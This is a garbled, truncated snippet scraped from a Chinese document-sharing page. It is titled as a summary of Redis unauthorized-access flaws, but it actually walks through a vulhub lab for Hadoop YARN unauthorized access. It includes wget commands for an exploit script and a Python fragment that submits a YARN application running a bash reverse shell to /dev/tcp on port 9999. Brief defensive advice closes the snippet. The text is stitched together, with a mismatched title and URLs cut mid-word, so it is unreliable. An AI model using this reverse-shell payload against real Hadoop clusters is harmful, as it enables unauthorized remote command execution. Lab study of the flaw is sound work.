常见Redis未授权访问漏洞总结com/vulhub/vulhub/master/hadoop/unauthorized- yarn/docker-compose.yml wget https://raw.githubusercontent.com/vulhub/vulhub/master/hadoop/unauthorized- yarn/exploit.py #或者利用DownGit下载 https://github.c com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn DownGit网址:https://minhaskamal.github.io/DownGit/#/home docker-compose build && docker-compose up -d #编译并启动环境 访问 http://192.168.18.129:8088/cluster 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data) 反弹成功 防御手段 -如无必要,关闭 Hadoop Web 管理页面。 -开启身份验证,防止未经授权用户访问。0 码力 | 44 页 | 19.34 MB | 1 年前3
共 1 条
- 1













